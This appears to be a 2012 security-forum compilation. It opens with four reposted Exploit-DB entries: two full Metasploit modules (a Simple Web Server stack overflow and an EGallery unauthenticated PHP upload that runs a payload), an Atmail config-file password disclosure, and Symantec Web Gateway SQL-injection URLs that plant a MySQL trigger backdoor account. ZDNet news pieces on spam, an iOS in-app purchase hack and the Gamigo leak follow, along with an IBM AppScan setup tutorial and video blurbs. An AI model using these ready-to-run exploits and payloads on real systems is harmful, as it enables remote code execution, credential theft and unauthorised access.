Simple Web Server Connection Header Buffer Overflow [table=width: 500, class: grid] [tr] [td]EDB-ID: 20028[/td] [td]CVE: N/A [/td] [td]OSVDB-ID: N/A[/td] [/tr] [tr] [td]Author: metasploit[/td] [td]Published: 2012-07-23[/td] [td]Verified: [/td] [/tr] [tr] [td]Exploit Code: [/td] [td]Vulnerable App: N/A[/td] [td][/td] [/tr] [/table] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking HttpFingerprint = { :pattern => [ /PMSoftware-SWS/ ] } include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "Simple Web Server Connection Header Buffer Overflow", 'Description' => %q{ This module exploits a vulnerability in Simple Web Server 2.2 rc2. A remote user can send a long string data in the Connection Header to causes an overflow on the stack when function vsprintf() is used, and gain arbitrary code execution. The module has been tested successfully on Windows 7 SP1 and Windows XP SP3. }, 'License' => MSF_LICENSE, 'Author' => [ 'mr.pr0n', # Vulnerability Discovery and PoC 'juan' # Metasploit module ], 'References' => [ ['EDB', '19937'], ['URL', 'http://ghostinthelab.wordpress.com/2012/07/19/simplewebserver-2-2-rc2-remote-buffer-overflow-exploit/'] ], 'Payload' => { 'BadChars' => "\x00\x0a\x0d", 'Space' => 2048, 'DisableNops' => true, 'PrependEncoder' => "\x81\xC4\x60\xF0\xFF\xFF", # add esp, -4000 }, 'DefaultOptions' => { 'EXITFUNC' => "process", }, 'Platform' => 'win', 'Targets' => [ [ 'SimpleWebServer 2.2-rc2 / Windows XP SP3 / Windows 7 SP1', { 'Ret' => 0x6fcbc64b, # call edi from libstdc++-6.dll 'Offset' => 2048, 'OffsetEDI' => 84 } ] ], 'Privileged' => false, 'DisclosureDate' => "Jul 20 2012", 'DefaultTarget' => 0)) end def check res = send_request_raw({'uri'=>'/'}) if res and res.headers['Server'] =~ /PMSoftware\-SWS\/2\.[0-2]/ return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit sploit = payload.encoded sploit << rand_text(target['Offset'] - sploit.length) sploit << [target.ret].pack("V") # eip sploit << rand_text(target['OffsetEDI']) sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{sploit.length}").encode_string print_status("Trying target #{target.name}...") connect send_request_cgi({ 'uri' => '/', 'version' => '1.1', 'method' => 'GET', 'connection' => sploit }) disconnect end end

EGallery PHP File Upload Vulnerability [table=width: 500, class: grid] [tr] [td]EDB-ID: 20029[/td] [td]CVE: N/A [/td] [td]OSVDB-ID: 83891[/td] [/tr] [tr] [td]Author: metasploit[/td] [td]Published: 2012-07-23[/td] [td]Verified: [/td] [/tr] [tr] [td]Exploit Code: [/td] [td]Vulnerable App: N/A[/td] [td][/td] [/tr] [/table] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "EGallery PHP File Upload Vulnerability", 'Description' => %q{ This module exploits a vulnerability found in EGallery 1.2 By abusing the uploadify.php file, a malicious user can upload a file to the egallery/ directory without any authentication, which results in arbitrary code execution. The module has been tested successfully on Ubuntu 10.04. }, 'License' => MSF_LICENSE, 'Author' => [ 'Sammy FORGIT', # Discovery, PoC 'juan' # Metasploit module ], 'References' => [ ['OSVDB', '83891'], ['BID', '54464'], ['URL', 'http://www.opensyscom.fr/Actualites/egallery-arbitrary-file-upload-vulnerability.html'] ], 'Payload' => { 'BadChars' => "\x00" }, 'DefaultOptions' => { 'ExitFunction' => "none" }, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets' => [ ['EGallery 1.2', {}] ], 'Privileged' => false, 'DisclosureDate' => "Jul 08 2012", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base path to EGallery', '/sample']) ], self.class) end def check uri = target_uri.path uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET', 'uri' => "#{uri}egallery/uploadify.php" }) if res and res.code == 200 and res.body.empty? return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end end def exploit uri = target_uri.path uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" payload_name = rand_text_alpha(rand(10) + 5) + '.php' boundary = Rex::Text.rand_text_hex(7) post_data = "--#{boundary}\r\n" post_data << "Content-Disposition: form-data; name=\"Filename\"\r\n\r\n" post_data << "#{payload_name}\r\n" post_data << "--#{boundary}\r\n" post_data << "Content-Disposition: form-data; name=\"folder\"\r\n\r\n" post_data << "#{uri}\r\n" post_data << "--#{boundary}\r\n" post_data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{payload_name}\"\r\n\r\n" post_data << "<?php " post_data << payload.encoded post_data << " ?>\r\n" post_data << "--#{boundary}--\r\n" print_status("#{peer} - Sending PHP payload (#{payload_name})") res = send_request_cgi({ 'method' => 'POST', 'uri' => "#{uri}egallery/uploadify.php", 'ctype' => "multipart/form-data; boundary=#{boundary}", 'data' => post_data }) # If the server returns 200 and the body contains our payload name, # we assume we uploaded the malicious file successfully if not res or res.code != 200 or res.body !~ /#{payload_name}/ print_error("#{peer} - File wasn't uploaded, aborting!") return end print_status("#{peer} - Executing PHP payload (#{payload_name})") # Execute our payload res = send_request_cgi({ 'method' => 'GET', 'uri' => "#{uri}#{payload_name}" }) # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. Print the status code for debugging purposes. if res and res.code != 200 print_status("#{peer} - Server returned #{res.code.to_s}") end end end

Atmail WebAdmin and Webmail Control Panel SQL Root Password Disclosure [table=width: 500, class: grid] [tr] [td]EDB-ID: 20037[/td] [td]CVE: N/A [/td] [td]OSVDB-ID: N/A[/td] [/tr] [tr] [td]Author: Ciph3r[/td] [td]Published: 2012-07-23[/td] [td]Verified: [/td] [/tr] [tr] [td]Exploit Code: [/td] [td]Vulnerable App: N/A[/td] [td][/td] [/tr] [/table] ###################################################################################### # Vuln Title: Atmail WebAdmin and webmail Control Panel Remote Access SQL Root password Vulnerability # # Author: FaryadR (a.k.a Ciph3r) # tested on : Atmail Email Server 6.20.8 # Twitter : https://twitter.com/faryadR # Mail : Ciph3r.secure@gmail.com # Website : http://0c0c0c0c.com # Vendor : http://atmail.com # Powered by Atmail 6.20.8 - WebAdmin Control Panel # ###################################################################################### [+]Vulnerability : you can Access All Atmail Webadmin Mail server Configuration and SQL Root Password [+]Poc : Go to webmail and config Directory and type dbconfig.ini for Access all SQL Configuration [+]Demo for Test Vuln : [+]Atmail 6.20.8 http://server/config/dbconfig.ini

Symantec Web Gateway 5.0.3.18 Blind SQLi Backdoor via MySQL Triggers [table=width: 500, class: grid] [tr] [td]EDB-ID: 20044[/td] [td]CVE: 2012-2961[/td] [td]OSVDB-ID: N/A[/td] [/tr] [tr] [td]Author: muts[/td] [td]Published: 2012-07-23[/td] [td]Verified: [/td] [/tr] [tr] [td]Exploit Code: [/td] [td]Vulnerable App: N/A[/td] [td][/td] [/tr] [/table] ###################################################################################### # Exploit Title: Symantec Web Gateway 5.0.3.18 Blind SQLi Backdoor via MySQL Triggers # Date: Jul 23 2012 # Author: muts # Version: Symantec Web Gateway 5.0.3.18 # Vendor URL: http://www.symantec.com # # Timeline: # # 12 Jun 2012: Vulnerability reported to CERT # 22 Jun 2012: Response received from CERT with disclosure date set to 20 Jul 2012 # 26 Jun 2012: Email received from Symantec for additional information # 26 Jun 2012: Additional proofs of concept sent to Symantec # 06 Jul 2012: Update received from Symantec with intent to fix # 20 Jul 2012: Symantec issued patch: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120720_00 # 23 Jul 2012: Public Disclosure # ###################################################################################### Accessing the following URLs will create a new trigger that will create a user account on the victim database: https://server/spywall/ldap_latest.php?ip=1 union select 'TYPE=TRIGGERNAME' into outfile '/var/lib/mysql/spywall_db/ins_trig.TRN' LINES TERMINATED BY '\ntrigger_table=eventlog\n';-- https://server/spywall/ldap_latest.php?ip=1 union select 'TYPE=TRIGGERS' into outfile '/var/lib/mysql/spywall_db/eventlog.TRG' LINES TERMINATED BY '\ntriggers=\'CREATE DEFINER=`shadm`@`localhost` trigger ins_trig after insert on eventlog\\nfor each row\\nbegin\\nINSERT INTO users VALUES("muts","21232f297a57a5a743894a0e4a801fc3","NULL","4773","2","3","N/A","0","0","0","","hacker@offsec.com","1336255408","0","0","0");\\nend\'\nsql_modes=0\ndefiners=\'shadm@localhost\'\nclient_cs_names=\'latin1\'\nconnection_cl_names=\'latin1_swedish_ci\'\ndb_cl_names=\'latin1_swedish_ci\'\n';-- With the MySQL trigger in place, an authenticated user can initiate a reboot of the remote system by accessing the following URL. When a user logs back in to the application, the trigger will be activated and the new user will be added to the system. https://server/spywall/scheduledReboot.php

India sends you the most spam Summary: More than one in 10 of every spam e-mail sent in the world comes from India. More broadly, every other spam e-mail sent in the world comes from Asia. By Emil Protalinski for Zero Day | July 23, 2012 -- Updated 21:26 GMT (14:26 PDT) What country is responsible for the majority of the spam sent in the world? You can excuse the usual culprits that have led the pack in years before like Canada, China, Brazil, South Korea, and the U.S. There's a new kid on the block, and she's pretty big: India. In fact, if you get spam (and who doesn't?), there's a more than one in 10 chance that it was relayed from an Indian computer. The latest data comes from Sophos, which regularly releases a Dirty Dozen spam report for every quarter. This one is for Q1 2012: India - 11.4 percent Italy - 7.0 percent South Korea - 6.7 percent U.S. - 6.2 percent Vietnam - 5.8 percent Brazil- 4.4 percent Pakistan - 3.7 percent China - 3.2 percent France - 3.1 percent Russia - 2.9 percent Poland - 2.7 percent Taiwan - 2.6 percent Other - 40.3 percent India actually topped the last Dirty Dozen report as well, when it overtook the U.S. as the world's top spam-relaying country in Q4 2011. At the time, India contributed 9.3 percent of all spam sent worldwide, while the U.S. was at 8.3 percent. Now India has solidified its position as the biggest global contributor to the junk e-mail problem. It's at 11.4 percent while all the remaining countries are in the single digits. India is contributing to the growing percentage of spam that comes from its continent. The latest breakdown is as follows: Asia (49.7 percent), Europe (26.4 percent), South America (11.2 percent), North America (8.6 percent), Africa (3.6 percent), and Other/Unclassified (0.5 percent). Most of the spammers probably don't promote Asian goods nor do they reside in Asia. Instead, they are simply relaying their messages through compromised Asian zombie computers part of a botnet. "The chief driver for Asia's dominance in the spam charts is the sheer number of compromised computers in the continent," a Sophos spokesperson said in a statement. "Malicious hackers hijack poorly-protected computers, and command them - without their owners realising - to send out unwanted money-making messages and malicious links. Everyone has a responsibility to ensure that their PC or Mac is properly defended against such attacks. If they take no care over their computers they're simply adding to the world’s spam problem. The latest 'Dirty Dozen' stats suggest that as more first-time internet users get online in growing economies they are not taking appropriate measures to block the malware infections that turn their PCs into spam-spewing zombies. http://www.zdnet.com/india-sends-you-the-most-spam-7000001422/

IBM Rational Appscan is one of the most widely used tools in the arena of web application penetration testing. It is a desktop application which aids security professionals to automate the process of vulnerability assessments. This article focuses on configuring and starting a scan using Appscan. Analysing the scan results will be covered in my next article. Main features in Appscan: The Rational Appscan 8.5 Standard edition has many new features, most of which I cover in the brief outline below: Flash support: Appscan 8.0 has increased flash support compared to its earlier versions. It can now explore and test applications based on an Adobe Flex framework. AMF protocol is also supported. Glass box testing: Glass box scanning is a new feature introduced in Appscan. This process installs an agent on the server which helps find hidden URLs and additional issues. Web services scanning: Web service scanning is one area which organizations are looking for a more effective automated support, and Appscan has scored well in this area. Java script security analyzer : Appscan has introduced JavaScript security analyser which analyses the crawled html pages for vulnerabilities and allows users to focus on different client-side issues and DOM (document object model) based XSS problems. Reporting: Based on your requirements, you can generate reports in desired formats and include desired fields in it. Remediation support: For the identified vulnerabilities, the program provides a description of the issue along with the remediation notes. Customizable scanning policies: Appscan comes with a set of defined scanning policies. You can customize the policies to suit your needs. Tools support: It has tools like Authentication Tester, Token Analyzer, and HTTP Request Editor which comes in handy when testing for vulnerabilities manually. Support for Ajax and dojo frameworks. Let us now proceed to learn more about installation and the process of scanning web applications using Rational Appscan. Installation: To run Rational Appscan the system needs to have a minimum of 2 GB RAM. Also make sure to install .NET Framework and Adobe Flash player to execute flash content during scanning. Before we proceed further, it is worth noting that this automated scanner sends loads of data to the server while the scan is in progress. So it might delete files on the server, add new records or even bring the server down unintentionally. Thus, it is advisable to properly backup of all the data before you proceed with the scan. Before you click the setup file, close any applications that are open. After clicking on the setup file, the installation wizard appears. If you have not installed .NET Framework version earlier, Appscan will now install the feature and asks for a restart. By following the wizard instructions the installation process can be completed pretty easily. If you are using a default license, you will be allowed to scan only the Appscan testing website. To scan your own site, you need to purchase one. Explore & Test Stages: Before we start a scan, let us try to have an overview of how Appscan works. Any automated scanner has two goals: Find out all the available links and attack the application to find vulnerabilities. Explore: In the explore stage Appscan tries to traverse through all the available links in the website and build a hierarchical structure. It sends requests and depending on the responses, it identifies the locations where there is a scope for vulnerability. For example, upon seeing a login page it would identify that there is a scope for authentication bypass through an sql injection. Note that it would only “identify” the test case but it would not perform any attack in this stage. In this way it sends several requests in this stage and builds the structure of the site while noting down the test cases. Test: In the test stage, Appscan attacks the application to test for the vulnerabilities. The actual attack payloads are now unleashed to identify the security holes in the test cases that were built in the explore stage. It would also rank the severity of the risk. The test stage might reveal new links present in the site. So Appscan begins another round of scans after completing the explore and test stages and continues to do the same until there are no more links to be tested. Please note that the number of rounds of scanning is also configurable by the user in settings. Start a scan in Appscan : A trial version of Appscan can be downloaded and installed from the below link: Download : IBM Security AppScan V8.5 To begin a scan, start Appscan and you’ll see the Welcome screen as shown in Figure 1 . Figure 1 Click on “Create New Scan” to start scanning a new web application. Figure 2 Select a scan template that suits your requirements. Templates consist of a scan configuration that is already defined. After selecting a template, the configuration wizard appears. It will ask you to select the type of scan. Select “Web Application Scan” and click on next. The scan configuration wizard is the core part of this tool. Using this we can let Appscan know what we are expecting from it. There are plenty of options available, and they have many choices among them. URL and Servers Starting URL: Under this feature specify the Starting URL of the scan. In most of the cases this would be the login page of the website. I have chosen Altoro Mutual which is a demo site to test for web application vulnerabilities. If you want to limit the scan only to the links under this directory, select the check box. Case Sensitive Path: If your server is case sensitive to URL’s, then select this option. Case-sensitivity of a server depends upon the underlying operating system. Linux/UNIX is case-sensitive, whereas Windows is not. Figure3 Additional Servers and Domains: During the scan Appscan tries to crawl through all the links present in the site. When it discovers a link which is pointing to a different domain it will not attack the link unless it is specified under “Additional Servers and Domains” part. So by specifying a link under this tab, you are basically telling the Appscan that it’s OK to scan this link even though it’s not under the scan URL domain. Click on next button to proceed. Login Management: During the scan process, Appscan might accidentally hit a logout button or might hit a function that could logout the Appscan. So, to log in to the application we need to specify the process under this section. Recorded: Upon selecting this option a new browser appears and tries to connect to the site specified as the start URL of this scan. You need to enter the credentials and log into the application. Once done, just close the browser. DO NOT click on the logout button as it defeats the whole purpose of going through this process. Also notice that new browser opened is not IE or Mozilla, but Appscan browser. You can change this browser option in Appscan under Tools à Options à Advanced, set the value of OpenIEBrowser to 0 -for the AppScan browser, 1 – for Internet Explorer, 2 – for Firefox, 3 – for Chrome. This is extremely useful in situations where the site behaves differently in each browser. Figure 4 Prompt: Appscan prompts you to log into the application every time it logs out. Select this option only if you are planning to sit through the entire scan of your system. If your application implements CAPTCHA then this is one way to go ahead with the scan. Automatic: Under this you can directly specify the user name and password that needs to be used to log into the application. Figure 5 Click on next to continue. Test Policy: Under test policy you need to select the policy that most suits your requirements. The available policies are Default, Application-only, infrastructure-only, Invasive, Complete, the vital few, etc. out of which default policy is mostly used. If you do not want to send tests on login and logout pages, you can select that option here. Figure 6 Click on next to continue. Complete: This is the final step in starting the scan. IBM Rational Appscan allows choosing the way you want to start the scan i.e. a full scan, explore only scan, etc. Start a full automatic scan: With the configuration created earlier, Appscan would explore and then proceed to test stage as described earlier in this article. Start with automatic explore only: Appscan will only explore the application (i.e. crawl the application) but does not send any attacks. Start with manual explore: A browser will be opened, and you can manually browse through the application. You can select the last option (i.e. I will start scan later) when you would like to make more changes to the scan configuration. We are almost ready to fly but before we do that there is something very important to deal with, which is the heart and soul of the Appscan – “Full scan Configuration” window. Let’s understand why it is so important for scanning any application. Figure 7 Full Scan Configuration: For any successful communication it is very important that both parties are involved in the process and both individuals acqnowledge the requirements and expectations of each other. Only then can each person meet set goals. The same thing applies here. The more explicit you are when you specify your requirements, the better results you get. This full scan configuration window offers a way for Appscan to narrow down on your requirements. The options which you have already selected will be reflected here automatically (scan URL, test policy, etc.) As seen in the figure below, there are four main sections – Explore, Connection, Test, and General. Let us see about them in detail. Explore: The following are the options available under this: URL and Servers: As explained above, details about scan URL and additional servers come under this. Login Management: In addition to the Login method, you can specify if you want Appscan to login concurrently. This will decrease the total scan time. You can also specify the regular expressions to detect the logout pages. Figure 8 Environment Definition: Under this setting, you can specify the details of operating system, Web server, database server, and other third-party components, which can all help significantly improve the performance and accuracy of the scan. Exclude Paths and Files: If you want to exclude a particular path in your site from the scan, or even exclude particular files say .mp3 or 7z, you can specify them under this tab by using a regular expression. Explore Options: The redundant path option helps Appscan limit the number of times identical paths may be scanned. This is important because sometimes Appscan might enter into an endless loop hitting the same URLs again and again. With the redundant path option engaged, once the limit is reached, Appscan exits the loop. The main option in this section defines the the depth first and breadth first. In breadth first, Appscan will explore all links on a page before proceeding to the next page. In depth first, Appscan will proceed as it finds each new link. Parameters and Cookies: Includes details about the parameters and the cookies present in the application. Automatic Form Fill: During the scan, Appscan comes across forms which need some input. For instance, a registration page might need input values like username, address, etc. If you want Appscan to automatically fill them for you, then select this option. Error pages: Your input under this will help Appscan figure out the error pages. Multi-Step Operations: There are certain parts of the application that are reached only when you request data in certain order (for instance ecommerce sites). You can record their sequence here by clicking on the start recording button. Glass box Scanning: Glass box scanning is a new feature introduced in Appscan where in an agent will be installed on the server which helps the scanner to find hidden URLs and additional issues. Communication and Proxy: You can specify whether the scanner can use IE proxy settings (or cannot use any proxy) under this. HTTP Authentication: To use client side certificates, upload the certificate file and key file under the “client-side certificate” section and password. Test Policy: All the test names are listed under this option, and you can uncheck any of them if you do not want Appscan to scan for that particular vulnerability. Test Options: Here Appscan presents you with the option of selecting adaptive testing . Appscan sends lot of tests and usually takes a lot of time. But by selecting adaptive testing, Appscan will try to determine the appropriate tests to send. For instance, it might detect that the underlying server is IIS and send only those test cases which IIS is vulnerable to. It would not check for issues related to other servers. Privilege Escalation: You can upload the scan files which are scanned with a different privileged user or an unauthenticated user. Scan Expert: Scan expert explores the application and presents you with recommendations to scan the application better. Click on OK and this will take you back to the initial scan wizard window. Select “start a full automatic scan” and click on finish. This completes the configuring process and start of a scan in Appscan. In my next article we will explore more about analysing the scan results in Appscan. References InfoSec Resources

Hacker on Apple's iOS in-app purchase fix: 'Game is over' By Emil Protalinski for Zero Day | July 23, 2012 -- Updated 16:42 GMT (09:42 PDT) Summary: Apple recently announced iOS 6 will block the hacking of its In-App Purchase program. The Russian hacker behind the attack has declared that Apple's fix will indeed block his circumvention technique. He's leaving his service open until iOS 6 is released, however, and pushing onwards with his Mac in-app hack. Two weeks ago, Russian developer Alexey Borodin hacked Apple's In-App Purchase program for all devices running iOS 3.0 or later, allowing iPhone, iPad, and iPod touch users to circumvent the payment process and essentially steal in-app content. Apple confirmed the workaround and last week announced a temporary fix and that would patch the holes with the release of iOS 6. Borodin today declared Apple's solution indeed stops his hack. Here's what he had to say, in a post on in-appstore.com titled "It's all over... for now.": By examining last apple's statement about in-app purchases in iOS 6, I can say, that currently game is over. Currently we have no way to bypass updated APIs. It's a good news for everyone, we have updated security in iOS, developers have their air-money. When Cupertino first tried to block the hack, it failed. Now the company finally has a proper solution, albeit temporary. We'll have to wait for iOS 6 to finally and completely block this hack. In the meantime, Borodin says the "service will still remain operational until iOS 6 comes out." Furthermore, he's still hard at work on the Mac in-app purchase hack he disclosed last week: The another thing is for in-appstore for OS X. We still waiting for apple's reaction and we have some cards in the hand. It's good that OS X is open. The worst part about the iOS hack was that developers had no way of protecting their apps. Using store receipts didn't work as Borodin's service simply needed a single donated receipt, which it could then use to authenticate anyone's purchase requests. His circumvention technique relied on installing certificates (for a fake in-app purchase server and a custom DNS server), changing DNS settings to allow the authentication of "purchases," and finally emulating the receipt verification server on the Apple App Store. Affected iOS apps treat Borodin's server as an official communication because of how Apple authenticates a purchase. Until recently, there was nothing that ties the purchase directly to a customer or device, meaning a single purchased receipt could be used again and again. In short, this hack meant in-app purchase requests were being re-routed as well as approved. Now developers can thwart the approval process as they wait for iOS 6. Still, Cupertino is transmitting its customers' Apple IDs and passwords in clear text (Apple assumed it would only ever be communicating with its own server). The following information is transferred from your device to Borodin's server: app restriction level, app id, version id, device guid, in-app purchase quantity, in-app purchase offer name, app identifier, app version, your language, and your locale. Whoever operates in-appstore.com could easily be gathering everyone's iTunes login credentials (as well as unique device-identifying data) in a classic man-in-the-middle attack. My guess is Apple will also address this part of the hack in iOS 6, a release which Boroding has approved. http://www.zdnet.com/hacker-on-apples-ios-in-app-purchase-fix-game-is-over-7000001409/

8.24 million Gamigo passwords leaked after hack By Emil Protalinski for Zero Day | July 23, 2012 -- Updated 15:27 GMT (08:27 PDT) Summary: Gamigo was hacked back in February but only in July are we seeing the results. More than 8.24 million e-mail addresses and passwords have been leaked after what looks like the biggest security breach of the year (so far). Months after Gamigo warned its users of a server breach, 8,243,809 user account credentials (e-mail addresses and encrypted passwords) have made their way online. If you've never heard of it, Gamigo is a German online games publisher that focuses on Massively Multiplayer Online Role-Playing Games (MMORPGs) and has so far released 14 client games as well as five browser games. To check whether your account was one of the 8 million that have been compromised, head over to PwnedList, which tells me just recently finished adding this release to its databases. So, how did this all start? Sometime in late February 2012, Gamigo was hacked by someone who calls him or herself "8in4ry_Munch3r." The company's website was taken down for an extended period of "maintenance." On March 1, Gamigo sent out the following e-mail to its users: Dear Community, As you have all already noticed, our game servers, websites and forums are partially unreachable at the moment. We would like to explain to you what happened and what has been done on our side. There was an attack on the gamigo database in which user information, such as alias usernames and encrypted passwords were stolen. An excerpt from these was published in the gamigo forums. We detected the attack and are working to the utmost of our resources to repair the damage and determine how it happened. Your character data, including items, is safely stored on the backup! We cannot rule out that the intruder(s) is/are still in possession of additional personal data, although to date we have received no report of any fraudulent use. To prevent any unauthorized access to your account, we have reset all passwords for the gamigo account system and for all gamigo games! The gaming site also offered its users guidance on what to do in the aftermath of the hack. Please follow the following steps to recover access to your gamigo accounts and get back to playing again: Step 1: Go to the gamigo Account System https://en.gamigo.com/showlayer/resetpassword and set up a new password for the gamigo aAccount System. Please make certain that the new password is not the same as the old one! Step 2: Log in to the gamigo Account System with the new password and go to "My Games." Please select a new, secure password for each of your games. Step 3: Important: Please also immediately change the passwords for all game forums you visit, to ensure that your data is safe there as well. A detailed set of instructions on changing your password can be found in our guidelines at http://assets.cdn.gamigo.com/marketing/portal_en/password-help.pdf. If you have problems, please contact our Support team at https://ticket.gamigogames.de/index.php?languageid=1. We greatly regret this incident and any inconvenience it has caused to you. Gamigo then returned to business as usual, and all was well. The hackers behind the attack, however, were far from done. They were hard at work compiling all the pilfered user accounts and passwords. On July 6, a forum topic on InsidePro titled "11? md5 hashlist to dump" was posted by a user "-=lebed=-": Free large file hosting. Send big files the easy way! Please test your dictionaries OOPS!, the list should lead to a common mind, and that there is only a first hash, and then type E-mai: hash That was at the beginning of July, but we're almost at the end. So, what took so long? Well, the leak was only spotted by PwnedList after they saw the following message from _Laz3r_ on July 16: @gattaca Also http://gamigo.com got popped back in March, hashes dumped 7/6 on insidepro. About 8m email+hashes. InsidePro Software :: View topic - 11? md5 hashlist to dump Here we are, a week later, and the breach is now fully public. This means we can take a closer look at what exactly was obtained by the hackers. The SendSpace link pointed to a 478MB file called "ALL.txt" with over 11 million account credentials. Some 6 percent were duplicates, but the rest were new. The link is dead now, but PwnedList managed to download and index it before it went down. The company gave me this quick analysis of the leak: German accounts: .de: 2.4 million t - online.de accounts: 100,000 US accounts: .com: 3 million French accounts: .fr: 1.3 million The e-mail addresses affect the usual big guys: Microsoft's Windows Live Hotmail, Google's Gmail, and Yahoo Mail. That being said, domains pointing to corporations such as Allianz, Deutsche Bank, ExxonMobil, IBM, and Siemens were also found among the list of compromised user credentials. The good news is that more than 5,000 e-mail addresses included the name Gamigo, suggesting that they were created specifically to register for the gaming site. Still, that number only represents 0.0006 percent of the total number of e-mail addresses and passwords that were leaked. While the compromised accounts are unlikely to be useful on Gamigo's sites, since the gaming publisher forced a password reset for all its users, that doesn't mean it can't be used elsewhere. If you use the same e-mail address and password combination elsewhere, make sure to change it there as well. This breach is bigger than anything we've seen so far this year. In the last few months, there have been a slew of attacks against the following sites: LinkedIn, eHarmony, Last.fm, Yahoo, Android Forums, Billabong, Formspring, and Nvidia, among others. The largest one was against LinkedIn, which saw the leak of 6.46 million passwords. Gamigo now tops the list. I have contacted Gamigo about this leak and will update you if I hear back. http://www.zdnet.com/8-24-million-gamigo-passwords-leaked-after-hack-7000001403/

Securitytube Python Scripting Expert Module 3-8: Programming With Scapy Description: We have released the SecurityTube Python Scripting Expert course: SecurityTube Python Scripting Expert ? SecurityTube Trainings In this video, we learn how to use Scapy as a library in our Python scripts to charge them up with some ammunition. More example videos from the course is available here: http://www.securitytube.net/groups?operation=view&groupId=11 The SecurityTube Python Scripting Expert is now available for immediate subscription and download here: SecurityTube Python Scripting Expert ? SecurityTube Trainings

Description: In this video you will learn how to Analysis a malware (Botnet) using IDApro tool. In this video they will shows us a Scenario based case study which included the complete anaylsis process for malware consisting. This video is part of securityeploded. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: